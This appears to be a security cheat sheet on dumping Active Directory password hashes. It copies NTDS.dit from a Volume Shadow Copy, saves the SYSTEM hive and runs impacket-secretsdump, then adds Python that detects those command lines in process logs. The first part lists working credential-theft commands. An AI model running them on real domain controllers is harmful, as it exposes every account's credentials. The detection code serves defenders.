Shadow Copies

Use the Microsoft-signed vshadow tool to take a snapshot of the Domain Controller

vshadow.exe -nw -p C:

Find the Shadow copy device name

It will look something like this: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2

Copy NTDS.dit out of the shadow copy

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\ntds\ntds.dit c:\ntds.dit.bak

Grab the system hive

reg.exe save hklm\system c:\system.bak

Dump NTDS.dit locally

impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL
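
Detecting this sequence: the steps above leave distinctive command lines in process-creation logs. The following Python is an added example, not part of the original page. It matches those command lines in constructed events and correlates them per host, rating a host highest when both the ntds.dit copy and the SYSTEM hive save appear, since the final dump step needs both files. The event tuple layout, the 15-minute window and the severity labels are assumptions.

```python
import re
from collections import defaultdict

# One pattern per step of the procedure on this page (case-insensitive).
STEP_PATTERNS = {
    "snapshot": re.compile(r"\bvshadow(?:\.exe)?\b.*\s-p\b", re.I),
    "ntds_copy": re.compile(r"HarddiskVolumeShadowCopy\d+\\.*ntds\.dit", re.I),
    "system_hive": re.compile(
        r"\breg(?:\.exe)?\s+save\s+(?:hklm|hkey_local_machine)\\system\b", re.I),
}

# Constructed process-creation events: (host, epoch seconds, command line).
SAMPLE_EVENTS = [
    ("DC01", 1000, r"vshadow.exe -nw -p C:"),
    ("DC01", 1060, r"cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2"
                   r"\windows\ntds\ntds.dit c:\ntds.dit.bak"),
    ("DC01", 1120, r"reg.exe save hklm\system c:\system.bak"),
    ("DC02", 2000, r"reg.exe save hklm\software c:\sw.bak"),  # unrelated hive
    ("FS01", 3000, r"vshadow.exe -nw -p D:"),                 # snapshot only
]

def classify(cmdline):
    """Return the set of procedure steps a command line matches."""
    return {name for name, rx in STEP_PATTERNS.items() if rx.search(cmdline)}

def detect(events, window=900):
    """Correlate steps per host; return {host: (severity, sorted steps)}."""
    hits = defaultdict(list)
    for host, ts, cmdline in events:
        for step in classify(cmdline):
            hits[host].append((ts, step))
    alerts = {}
    for host, seen in hits.items():
        copies = [ts for ts, step in seen if step == "ntds_copy"]
        if copies:
            # Steps within `window` seconds of an ntds.dit copy count as one activity.
            near = {s for ts, s in seen if any(abs(ts - c) <= window for c in copies)}
            severity = "high" if "system_hive" in near else "medium"
        else:
            near = {s for _, s in seen}
            severity = "low"
        alerts[host] = (severity, sorted(near))
    return alerts

if __name__ == "__main__":
    for host, (severity, steps) in sorted(detect(SAMPLE_EVENTS).items()):
        print(f"{host}: {severity} {steps}")
```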
